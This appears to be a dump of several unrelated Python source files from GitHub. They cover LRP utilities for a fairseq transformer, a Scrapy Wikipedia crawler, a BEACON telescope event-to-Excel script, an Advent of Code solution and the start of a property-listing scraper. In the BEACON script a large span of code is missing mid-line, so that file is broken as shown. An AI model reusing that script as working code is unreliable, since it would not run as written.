1\n return autograd.functional.jacobian(func, inputs) # out_dims , input_dims\n\n\ndef batch_diag(t: torch.Tensor):\n batch_size, hid_size = t.size()\n diag_t = torch.zeros((batch_size, hid_size, hid_size)).to(t)\n diag_t.as_strided(t.size(), [diag_t.stride(0), diag_t.size(2) + 1,],).copy_(t)\n return diag_t\n\n\ndef batch_diag_value(v: torch.Tensor, m_size):\n assert len(v.size()) == 1\n batch_size = v.size(0)\n # print(v)\n diag_t = torch.zeros((batch_size, m_size, m_size)).to(v)\n diag_t = (diag_t + torch.eye(m_size).to(device=v.device)[None]) * v[:, None, None]\n # index = torch.arange(0,m_size, device=v.device)\n # diag_t[:,index,index] = v\n return diag_t\n\n\nclass LRP:\n \"\"\" Helper class for layerwise relevance propagation \"\"\"\n\n alpha = 1.0\n beta = 0.0\n eps = 1e-10\n use_alpha_beta = True # if False, uses simplified LRP rule: R_i = R_j * z_ji / ( z_j + eps * sign(z_j) )\n consider_attn_constant = (\n False # used by MultiHeadAttn, considers gradient w.r.t q/k zeros\n )\n norm_dim = 1\n\n @classmethod\n def relprop(\n cls,\n function,\n out_relevance,\n inputs: Tuple[torch.Tensor],\n reference_inputs=None,\n reference_output=None,\n jacobians=None,\n batch_dim=0,\n ):\n \"\"\"\n computes input relevance given output_relevance using z+ rule\n works for linear layers, convolutions, poolings, etc.\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n :param function: forward function\n :param output_relevance: relevance w.r.t. layer output\n :param inps: a list of layer inputs\n :param reference_inputs: \\hat x, default values used to evaluate bias relevance.\n If specified, must be a tuple/list of tensors of the same shape as inps, default = all zeros.\n :param reference_output: optional pre-computed function(*reference_inputs) to speed up computation\n :param jacobians: optional pre-computed jacobians to speed up computation, same as jacobians(function(*inps), inps)\n\n \"\"\"\n assert len(inputs) > 0, \"please provide at least one input\"\n\n alpha, beta, eps = cls.alpha, cls.beta, cls.eps\n\n reference_inputs = reference_inputs or [\n torch.zeros_like(input).to(input) for input in inputs\n ]\n assert len(reference_inputs) == len(inputs)\n\n output = function(*inputs)\n reference_output = (\n reference_output\n if reference_output is not None\n else function(*reference_inputs)\n )\n assert isinstance(output, torch.Tensor) and isinstance(\n reference_output, torch.Tensor\n )\n assert out_relevance.size() == output.size()\n\n flat_out_relevance = out_relevance.view(-1)\n output_size = flat_out_relevance.size(0)\n\n # 1. compute jacobian w.r.t. all inputs\n jacobians = (\n jacobians if jacobians is not None else tuple_jacobian(function, inputs)\n )\n # ^-- list of [*output_dims, *input_dims] for each input\n assert len(jacobians) == len(inputs)\n\n jac_flat_components = [jac.view(output_size, -1) for jac in jacobians]\n # ^-- list of [output_size, input_size] for each input\n flat_jacobian = torch.cat(\n jac_flat_components, dim=-1\n ) # [output_size, combined_input_size]\n\n # 2. multiply jacobian by input to get unnormalized relevances, add bias\n\n flat_input = torch.cat(\n [input.view(-1) for input in inputs], dim=-1\n ) # [combined_input_size]\n flat_reference_input = torch.cat(\n [ref_input.view(-1) for ref_input in reference_inputs], dim=-1\n ) # [combined_input_size]\n batch_size = output.size(batch_dim)\n input_size_per_sample = flat_input.size(0) // batch_size\n flat_bias_impact = reference_output.view(-1) / input_size_per_sample\n\n flat_impact = (\n flat_bias_impact[:, None]\n + flat_jacobian * (flat_input - flat_reference_input)[None, :]\n )\n\n # ^-- [output_size, combined_input_size], aka z_{j<-i}\n\n if cls.use_alpha_beta:\n # 3. normalize positive and negative relevance separately and add them with coefficients\n flat_positive_impact = torch.maximum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_positive_normalizer = (\n torch.sum(flat_positive_impact, dim=cls.norm_dim, keepdim=True) + eps\n )\n flat_positive_relevance = flat_positive_impact / flat_positive_normalizer\n\n flat_negative_impact = torch.minimum(\n flat_impact, torch.zeros_like(flat_impact)\n )\n flat_negative_normalizer = (\n torch.sum(flat_negative_impact, dim=cls.norm_dim, keepdim=True) - eps\n )\n flat_negative_relevance = flat_negative_impact / flat_negative_normalizer\n flat_total_relevance_transition = (\n alpha * flat_positive_relevance + beta * flat_negative_relevance\n )\n else:\n raise NotImplemented()\n # flat_impact_normalizer = tf.reduce_sum(flat_impact, axis=cls.norm_axis, keep_dims=True)\n # flat_impact_normalizer += eps * (1. - 2. * tf.to_float(tf.less(flat_impact_normalizer, 0)))\n # flat_total_relevance_transition = flat_impact / flat_impact_normalizer\n # note: we do not use tf.sign(z) * eps because tf.sign(0) = 0, so zeros will not go away\n\n flat_in_relevance = torch.einsum(\n \"o,oi\", flat_out_relevance, flat_total_relevance_transition\n )\n # ^-- [combined_input_size]\n\n # 5. unpack flat_inp_relevance back into individual tensors\n in_relevances = []\n offset = 0\n for input in inputs:\n input_size = input.view(-1).size(0)\n inp_relevance = flat_in_relevance[offset : offset + input_size].view_as(\n input\n )\n in_relevances.append(inp_relevance)\n offset = offset + input_size\n\n return cls.rescale(out_relevance, in_relevances, batch_dim=batch_dim)\n\n @classmethod\n def rescale(\n cls,\n out_relevance: torch.Tensor,\n in_relevances: Tuple[torch.Tensor],\n batch_dim=None,\n ):\n # assert isinstance(batch_axes, (tuple, list))\n sum_dims = tuple(\n i\n for i in range(len(in_relevances[0].size()))\n if batch_dim is None or i != batch_dim\n )\n ref_scale = out_relevance.abs().sum(\n dim=sum_dims, keepdim=True\n ) # batch_size x 1*\n inp_scales = [\n in_relevance.abs().sum(dim=sum_dims, keepdim=True)\n for in_relevance in in_relevances\n ] # list[batch_size x 1*]\n total_inp_scale = sum(inp_scales) + cls.eps # batch_size x 1*\n in_relevances = [\n in_relevance * (ref_scale / total_inp_scale)\n for in_relevance in in_relevances\n ]\n return in_relevances\n\n\nclass LRPWrapper(nn.Module):\n def __init__(self) -> None:\n super().__init__()\n self.store = {}\n\n def record(self, key, value):\n assert key not in self.store or self.store[key] is None\n self.store[key] = value\n\n def get_record(self, key):\n assert key in self.store and self.store[key] is not False\n if key not in self.store:\n return None\n return self.store[key]\n\n def clear_record(self):\n self.store.clear()\n for key, value in self._modules.items():\n if isinstance(value, LRPWrapper):\n value.clear_record()\n elif isinstance(value, ModuleList):\n for module in value:\n if isinstance(module, LRPWrapper):\n module.clear_record()\n elif isinstance(value, ModuleDict):\n for _, module in value.items():\n if isinstance(module, LRPWrapper):\n module.clear_record()\n\n def relprop(self, out_relevance):\n raise NotImplemented()\n\n\nclass AddWrapper(LRPWrapper):\n def __init__(self) -> None:\n super().__init__()\n\n def forward(self, x, y, record=False):\n if record:\n self.record(\"input1\", x)\n self.record(\"input2\", y)\n return x + y\n\n def relprop(self, out_relevance):\n input1 = self.get_record(\"input1\")\n input2 = self.get_record(\"input2\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input1 = input1.view(-1, input1.size(-1))\n flat_input2 = input2.view(-1, input2.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input1[i, None], flat_input2[i, None]),\n jacobians=[\n torch.eye(flat_input1.size(-1)).to(out_relevance)[None, :, None, :],\n torch.eye(flat_input2.size(-1)).to(out_relevance)[None, :, None, :],\n ],\n )\n for i in range(len(flat_input1))\n ]\n\n flat_in_relevance1 = torch.cat([items[0] for items in flat_in_relevance], dim=0)\n flat_in_relevance2 = torch.cat([items[1] for items in flat_in_relevance], dim=0)\n\n # flat_in_relevance1, flat_in_relevanc2 = LRP.relprop(\n # self, flat_out_relevance, (flat_input1, flat_input2)\n # )\n in_relevance1 = flat_in_relevance1.view_as(input1)\n in_relevance2 = flat_in_relevance2.view_as(input2)\n\n return in_relevance1, in_relevance2\n\n\nclass LinearWrapper(LRPWrapper):\n def __init__(self, linear: torch.nn.Module, activation_fn=None) -> None:\n super().__init__()\n self.weight = linear.weight\n self.bias = linear.bias\n self.activation_fn = activation_fn\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n x = x.matmul(self.weight.t())\n if self.bias is not None:\n x = x + self.bias\n if self.activation_fn is not None:\n x = self.activation_fn(x)\n return x\n\n def relprop(self, out_relevance):\n\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n # note: we apply relprop for each independent sample in order to avoid quadratic memory requirements\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[self.weight[None, :, None, :]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # if flat_input.size(0) == 1:\n # flat_in_relevance = LRP.relprop(\n # self,\n # flat_out_relevance,\n # (flat_input,),\n # jacobians=[self.weight[None, :, None, :]],\n # )[0]\n # else:\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass LayerNormWrapper(LRPWrapper):\n \"\"\"\n Performs Layer Normalization\n \"\"\"\n\n def __init__(self, layernorm) -> None:\n super().__init__()\n self.weight = layernorm.weight\n self.bias = layernorm.bias\n self.epsilon = layernorm.eps\n self.normalized_shape = layernorm.normalized_shape\n\n def forward(self, x, record=False):\n if record:\n self.record(\"input\", x)\n\n return F.layer_norm(\n x, self.normalized_shape, self.weight, self.bias, self.epsilon\n )\n\n def _jacobian(self, input):\n assert len(input.size()) == 2, \"Please reshape your inputs to [batch, dim]\"\n batch_size = input.size(0)\n hid_size = input.size(1)\n centered_input = input - torch.mean(input, dim=-1, keepdim=True)\n variance = torch.var(centered_input, dim=-1, unbiased=False, keepdim=True)\n invstd_factor = torch.rsqrt(variance)\n\n # note: the code below will compute jacobian without taking self.scale into account until the _last_ line\n # jac_out_wrt_invstd_factor = centered_input\n jac_out_wrt_variance = -0.5 * (variance + self.epsilon) ** (-1.5)\n\n jac_out_wrt_squared_difference = jac_out_wrt_variance / hid_size\n\n jac_out_wrt_centered_input = (\n batch_diag_value(invstd_factor[:, 0], hid_size)\n + jac_out_wrt_squared_difference[:, :, None]\n * 2\n * centered_input[:, None, :]\n * centered_input[:, :, None]\n )\n\n # jac_out_wrt_input = torch.matmul(\n # jac_out_wrt_centered_input,\n # (\n # torch.eye(hid_size).to(input)\n # - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n # ),\n # )\n jac_out_wrt_input = torch.matmul(\n jac_out_wrt_centered_input.float(),\n (\n torch.eye(hid_size).to(input)\n - (torch.ones((hid_size, hid_size)).to(input) / hid_size)\n ).float(),\n )\n return jac_out_wrt_input.half() # batch x hid_size x hid_size\n # return jac_out_wrt_input # batch x hid_size x hid_size\n\n def relprop(self, out_relevance):\n \"\"\"\n computes input relevance given output_relevance\n :param output_relevance: relevance w.r.t. layer output, [*dims, out_size]\n notation from DOI:10.1371/journal.pone.0130140, Eq 60\n \"\"\"\n input = self.get_record(\"input\")\n # input: [*dims, inp_size], out: [*dims, out_size]\n\n flat_input = input.view(-1, input.size(-1))\n flat_out_relevance = out_relevance.view(-1, out_relevance.size(-1))\n\n jacobians = self._jacobian(flat_input)\n flat_in_relevance = [\n LRP.relprop(\n self,\n flat_out_relevance[i, None],\n (flat_input[i, None],),\n jacobians=[jacobians[i, None]],\n )[0]\n for i in range(len(flat_input))\n ]\n flat_in_relevance = torch.cat(flat_in_relevance, dim=0)\n\n # flat_in_relevance = LRP.relprop(self, flat_out_relevance, (flat_input,))[0]\n in_relevance = flat_in_relevance.view_as(input)\n\n return in_relevance\n\n\nclass FFNWrapper(LRPWrapper):\n \"\"\"\n Feed-forward layer\n \"\"\"\n\n def __init__(self, linear_in: LinearWrapper, linear_out: LinearWrapper):\n super().__init__()\n self.linear_in = linear_in\n self.linear_out = linear_out\n\n def forward(self, x, record=False):\n x = self.linear_in(x, record=record)\n x = self.linear_out(x, record=record)\n\n def relprop(self, out_relevance):\n mid_relevance = self.linear_out.relprop(out_relevance)\n in_relevance = self.linear_in.relprop(mid_relevance)\n return in_relevance\n\n","repo_name":"DoubleVII/my-fairseq","sub_path":"fairseq/models/transformer_lrp/lrp_utils.py","file_name":"lrp_utils.py","file_ext":"py","file_size_in_byte":15853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9233882995","text":"from ..preProcess import preProcessStr, normalizeStr\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass WikiSpiderSpider(CrawlSpider):\n name = \"wiki_spider\"\n allowed_domains = [\"en.wikipedia.org\"]\n\n start_urls = [\n \"https://en.wikipedia.org/wiki/List_of_Marvel_Cinematic_Universe_films\"\n ]\n\n allow_urls = [r\"wiki/\"]\n deny_urls = [\n r\"wiki/Main_Page\",\n r\"wiki/Category:\",\n r\"wiki/Help:\",\n r\"wiki/ISO\",\n r\"wiki/Portal:\",\n r\"wiki/Special:\",\n r\"wiki/Talk:\",\n r\"wiki/Template:\",\n r\"wiki/Template_talk:\",\n r\"wiki/User_talk:\",\n r\"wiki/Wikipedia:\",\n r\"wiki/Wikipedia_talk:\",\n ]\n rules = (\n Rule(\n LinkExtractor(allow=allow_urls, deny=deny_urls),\n callback=\"parse_item\",\n follow=True,\n ),\n )\n\n N = 15000\n count = 0\n\n def parse_item(self, response):\n if self.count >= self.N:\n raise CloseSpider(f\"Scraped {self.N} items. Eject!\")\n\n self.count += 1\n\n data = {}\n data[\"page_url\"] = response.url\n\n data[\"page_title\"] = \"\".join(\n response.xpath(\n '//*[@id=\"firstHeading\"]/descendant-or-self::*/text()'\n ).getall()\n )\n\n maxDescriptionLen = 157\n description = \"\"\n totalP = int(float(response.xpath(\"count(/descendant::p)\").get()))\n numP = 0\n while len(description) < maxDescriptionLen and numP < totalP:\n description += normalizeStr(\n \" \".join(\n response.xpath(\n f\"/descendant::p[{numP}]/descendant-or-self::*/text()\"\n ).getall()\n )\n )\n numP += 1\n\n description = normalizeStr(description).strip()\n data[\"page_description\"] = (\n (description[:maxDescriptionLen] + \"...\")\n if len(description) > maxDescriptionLen\n else description\n )\n\n data[\"page_content\"] = preProcessStr(\n \" \".join(response.xpath(\"//p/descendant-or-self::*/text()\").getall())\n )\n\n headings = {}\n for i in range(2, 7):\n head_val = preProcessStr(\n \" \".join(\n response.xpath(f\"//h{i}/descendant-or-self::*/text()\").getall()\n )\n )\n if head_val:\n headings[f\"h{i}\"] = head_val\n\n data |= headings\n\n info_card = {}\n rows = response.xpath(\n '//*[@id=\"mw-content-text\"]/div[1]/table[contains(@class, \"infobox\")]/tbody/tr'\n )\n for row in rows:\n if row.xpath('./th[@class=\"infobox-above summary\"]'):\n continue\n\n img_box = row.xpath(\n './td[@class=\"infobox-image\"]/a[@class=\"image\"]/img/@src'\n )\n if img_box:\n info_card[\"img_url\"] = img_box.get()\n continue\n\n label_box = row.xpath('./th[@class=\"infobox-label\"]')\n if label_box:\n key = preProcessStr(\n \" \".join(\n label_box.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if not key:\n continue\n\n label_data = row.xpath('./td[@class=\"infobox-data\"]')\n if label_data:\n value = preProcessStr(\n \" \".join(\n label_data.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if value:\n info_card[key] = value\n\n data |= info_card\n\n # Invoking the shell from spiders to inspect responses\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n return data\n","repo_name":"Smile040501/Search-Engine","sub_path":"wiki_crawler/wiki_crawler/spiders/wiki_spider.py","file_name":"wiki_spider.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43480665729","text":"#!/usr/bin/env python3\n'''\nThis will add to the functionality of flipbook_reader.py and take any eventids_dict and try to collate the information\nfor the contained events into an excel file for easy note taking and viewing. It attempts to add airplane information\nand thus should be run with code that has pandas version >= 1.4.0. This version is also necessary for the used\n\"overlay\" function when writing to excel. \n'''\n\nimport sys\nimport os\nimport inspect\nimport h5py\nimport copy\nfrom pprint import pprint\n\nimport numpy\nimport scipy\nimport scipy.signal\nimport time\nimport pandas as pd\n\n#from beaconroot.examples.beacon_data_reader import Reader #Must be imported before matplotlib or else plots don't load.\nfrom beacon.tools.sine_subtract_cache import sineSubtractedReader as Reader\nfrom beacon.tools.data_handler import createFile\nfrom beacon.tools.fftmath import TemplateCompareTool\nfrom beacon.tools.fftmath import FFTPrepper\nfrom beacon.tools.correlator import Correlator\nfrom beacon.tools.data_slicer import dataSlicer\nfrom beacon.tools.flipbook_reader import flipbookToDict, concatenateFlipbookToDict, concatenateFlipbookToArray, concatenateEventDictToArray\nimport beacon.tools.get_plane_tracks as pt\nfrom tools.airplane_traffic_loader import getDataFrames, getFileNamesFromTimestamps\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib import cm, ticker\nfrom matplotlib.patches import Rectangle\nplt.ion()\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nraw_datapath = os.environ['BEACON_DATA']\n#processed_datapath = os.path.join(os.environ['BEACON_PROCESSED_DATA'],'backup_pre_all_map_run_12-5-2021')\nprocessed_datapath = os.environ['BEACON_PROCESSED_DATA']\nprint('SETTING processed_datapath TO: ', processed_datapath)\n\ndef enu2Spherical(enu):\n '''\n 2d array like ((e_0, n_0, u_0), (e_1, n_1, u_1), ... , (e_i, n_i, u_i))\n\n Return in degrees\n '''\n r = numpy.linalg.norm(enu, axis=1)\n theta = numpy.degrees(numpy.arccos(enu[:,2]/r))\n phi = numpy.degrees(numpy.arctan2(enu[:,1],enu[:,0]))\n # import pdb; pdb.set_trace()\n return numpy.vstack((r,phi,theta)).T\n\n\ndef writeEventDictionaryToDataFrame(initial_eventids_dict, ds=None, include_airplanes=True):\n try:\n data_keys = [\n 'calibrated_trigtime',\n 'phi_best_choice',\n 'elevation_best_choice',\n 'cr_template_search_h',\n 'cr_template_search_v',\n 'cr_template_search_hSLICERMAXcr_template_search_v',\n 'hpol_peak_to_sidelobe',\n 'vpol_peak_to_sidelobe',\n 'hpol_peak_to_sidelobeSLICERMAXvpol_peak_to_sidelobe',\n 'hpol_normalized_map_value',\n 'vpol_normalized_map_value',\n 'above_normalized_map_max_line',\n 'above_snr_line',\n 'impulsivity_h',\n 'impulsivity_v',\n 'impulsivity_hSLICERADDimpulsivity_v',\n 'similarity_count_h',\n 'similarity_count_v',\n 'p2p_gap_h',\n 'p2p_gap_v',\n 'csnr_h',\n 'csnr_v',\n 'snr_h',\n 'snr_v',\n 'p2p_h',\n 'p2p_v',\n 'std_h',\n 'std_v',\n 'filtered_std_h',\n 'filtered_std_v',\n 'filtered_snr_h',\n 'filtered_snr_v',\n 'filtered_p2p_h',\n 'filtered_p2p_v',\n 'filtered_p2p_gap_h',\n 'filtered_p2p_gap_v',\n 'filtered_csnr_h',\n 'filtered_csnr_v']\n\n if numpy.all([numpy.issubdtype(k, numpy.integer) for k in initial_eventids_dict.keys()]) or numpy.all(numpy.array(list(initial_eventids_dict.keys()))%1 == 0):\n print('Assuming passed \"initial_eventids_dict\" as eventids_dict format')\n eventids_dict = copy.deepcopy(initial_eventids_dict)\n eventids_array = concatenateEventDictToArray(initial_eventids_dict)\n else:\n print('Assuming passed \"initial_eventids_dict\" as flipbook format')\n eventids_dict = concatenateFlipbookToDict(initial_eventids_dict)\n eventids_array = concatenateFlipbookToArray(initial_eventids_dict)\n\n runs = list(eventids_dict.keys())\n\n force_fit_order = 3 #None to use varying order\n\n # outpath = './airplane_event_flipbook_%i'%time.time() \n # os.mkdir(outpath)\n\n\n if ds is None:\n print(\"Preparing dataSlicer\")\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_16384-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, analysis_data_dir=processed_datapath, verbose_setup=False)\n ds.prepareCorrelator()\n else:\n print('Using passed dataSlicer')\n\n status = numpy.zeros(len(eventids_array), dtype=str)\n\n data = { \n 'run' : eventids_array['run'],\n 'eventid' : eventids_array['eventid'],\n 'key' : eventids_array['key'],\n }\n\n monutau_links = []\n for eid in eventids_array:\n eventid = eid['eventid']\n run = eid['run']\n url = \"https://users.rcc.uchicago.edu/~cozzyd/monutau/#event&run=%i&entry=%i\"%(run,eventid)\n monutau_links.append('=HYPERLINK(\"%s\", \"link\")'%url)\n\n data['monutau'] = numpy.asarray(monutau_links)\n data['notes'] = [numpy.nan]*len(eventids_array)\n\n for key in data_keys:\n d = ds.getDataArrayFromParam(key, trigger_types=None, eventids_dict=copy.deepcopy(eventids_dict))\n data[key] = d\n\n if include_airplanes == True:\n print('Calculating airplane information')\n ds.prepareCorrelator()\n time_window_s = 5*60\n plot_distance_cut_limit = 500\n min_approach_cut_km = 1e6\n origin = ds.cor.A0_latlonel_hpol\n\n elevation_best_choice = ds.getDataFromParam(eventids_dict, 'elevation_best_choice')\n phi_best_choice = ds.getDataFromParam(eventids_dict, 'phi_best_choice')\n\n all_minimum_approach = numpy.zeros(len(eventids_array), dtype=float)\n all_event_times = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_r = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_t = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_rpt_at_event_time = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_r = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_airplane = numpy.zeros(len(eventids_array), dtype='= 1 and int(pd.__version__.split('.')[1]) >= 4:\n # flipbook_path = '/home/dsouthall/scratch-midway2/event_flipbook_1643154940'#'/home/dsouthall/scratch-midway2/event_flipbook_1642725413'\n # flipbook_path = './airplane_event_flipbook_1643947072'\n flawed_runs = numpy.array([6537,6538,6539]) #numpy.array([5775,5981,5993,6033,6090,6520,6537,6538,6539]) \n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','sept2021-week1-analysis','hand-scanned-event-info.xlsx')\n # include_airplanes = False\n for include_airplanes in [False, True]:\n #['/home/dsouthall/scratch-midway2/event_flipbook_1643154940', './airplane_event_flipbook_1643947072']\n for flipbook_path in ['./september-flipbook']:\n sorted_dict = flipbookToDict(flipbook_path, ignore_runs=flawed_runs)\n if True:\n sheetname = os.path.split(flipbook_path)[-1] + '_airplanes-included-%s'%str(include_airplanes)\n else:\n sheetname = 'raw_airplanes-included-%s'%str(include_airplanes)\n\n df = writeEventDictionaryToDataFrame(sorted_dict, include_airplanes=include_airplanes)\n writeDataFrameToExcel(df, filename, sheetname)\n # writeEventDictionaryToExcel(sorted_dict, filename, ds=None)\n else:\n print('This script requires pandas version >= 1.4.0')\n else:\n cmap = 'cool'#'coolwarm'\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_length = 16384\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_%i-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'%map_length\n \n run_batches = {}\n run_batches['batch_0'] = numpy.arange(5733,5974) # September data, should setup to auto add info to the \"notes\" section based off of existing sorting, and run this one those events for consistency\n run_batches['batch_1'] = numpy.arange(5974,6073)\n run_batches['batch_2'] = numpy.arange(6074,6173)\n run_batches['batch_3'] = numpy.arange(6174,6273)\n run_batches['batch_4'] = numpy.arange(6274,6373)\n run_batches['batch_5'] = numpy.arange(6374,6473)\n run_batches['batch_6'] = numpy.arange(6474,6573)\n run_batches['batch_7'] = numpy.arange(6574,6641)\n runs = numpy.array([])\n for k in (run_batches.keys()):\n runs = numpy.append(runs,run_batches[k])\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, \\\n low_ram_mode=True,\\\n analysis_data_dir=processed_datapath, trigger_types=[2], remove_incomplete_runs=True)\n\n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','paper', 'data','new-cut-event-info.xlsx')\n new_cut_dict = numpy.load( os.path.join( '/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/cuts_run5733-run6640_1652152119' , 'pass_all_cuts_eventids_dict.npy') , allow_pickle=True)[()]\n \n df = writeEventDictionaryToDataFrame(new_cut_dict, include_airplanes=False, ds=ds)\n writeDataFrameToExcel(df, filename, 'passing all cuts')\n\n old_cut_dicts = {}\n for i in range(8):\n f = os.path.join('/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/eventid_dicts', 'stage_2_eventids_dict_batch_%i.npy'%i)\n out = numpy.load( f , allow_pickle=True)[()]\n for run in list(out.keys()):\n old_cut_dicts[run] = out[run]\n\n\n new_cut_array = ds.organizeEventDict(new_cut_dict)\n old_cut_array = ds.organizeEventDict(old_cut_dicts)\n\n matching = ds.organizeEventDict(ds.returnCommonEvents(new_cut_dict, old_cut_dicts))\n matching_dict = ds.returnCommonEvents(new_cut_dict, old_cut_dicts)\n \n events_in_new_not_old = ds.organizeEventDict(ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts))\n events_in_new_not_old_dict = ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts)\n\n\n matching_df = df[numpy.logical_and(numpy.isin(df['run'], matching['run']), numpy.isin(df['eventid'], matching['eventid']))]\n writeDataFrameToExcel(matching_df, filename, 'in old')\n\n new_events_df = df[numpy.logical_and(numpy.isin(df['run'], events_in_new_not_old['run']), numpy.isin(df['eventid'], events_in_new_not_old['eventid']))]\n writeDataFrameToExcel(new_events_df, filename, 'new')\n\n\n\n","repo_name":"djsouthall/beacon","sub_path":"tools/write_event_dict_to_excel.py","file_name":"write_event_dict_to_excel.py","file_ext":"py","file_size_in_byte":23505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3665314078","text":"def run_main():\n increases = 0\n old_no = -1\n f = open(\"input/day1a.txt\")\n lines = list(map(int, f.readlines()))\n for i in range(0, 1998):\n a = lines[i]\n b = lines[i+1]\n c = lines[i+2]\n current_no = a + b + c\n if -1 < old_no < current_no:\n increases += 1\n old_no = current_no\n print(increases)\n\n\nif __name__ == '__main__':\n run_main()\n","repo_name":"jl881/aoc","sub_path":"2021/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43744444442","text":"import json\nimport re\nimport sys\nfrom urllib.request import urlopen, Request\n\nimport bs4\nimport requests\n\nexceptions = {}\nstatus_codes = {}\n\n\ndef main():\n global total_pages\n url = 'https://www.towerbudapest.com/en/sales'\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 '\n 'Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n property_links = []\n property_data_list = []\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for paragraph in soup.select('p[class*=\"kill-margin\"]'):\n if 'Page' in str(paragraph.contents[0]):\n total_pages = int(paragraph.contents[0].split(' ')[10])\n break\n print(\"found \" + str(total_pages) + \" pages\")\n for i in range(total_pages):\n print('=', end='')\n print()\n while True:\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for tag in soup.findAll('a',\n attrs={\n 'href': re.compile(\"^https://www.towerbudapest.com/en/sales/budapest_property/\")}):\n property_links.append(tag.get('href'))\n rightButton = soup.select('div[class*=\"text-right\"]')[0].select('button')\n print('.', end='')\n sys.stdout.flush()\n if len(rightButton) != 0:\n url = rightButton[0]['onclick'].split(\"'\")[1]\n else:\n print()\n break\n print()\n print(\"found \" + str(len(property_links)) + \" links\")\n property_links = list(set(property_links))\n print(str(len(property_links)) + \" 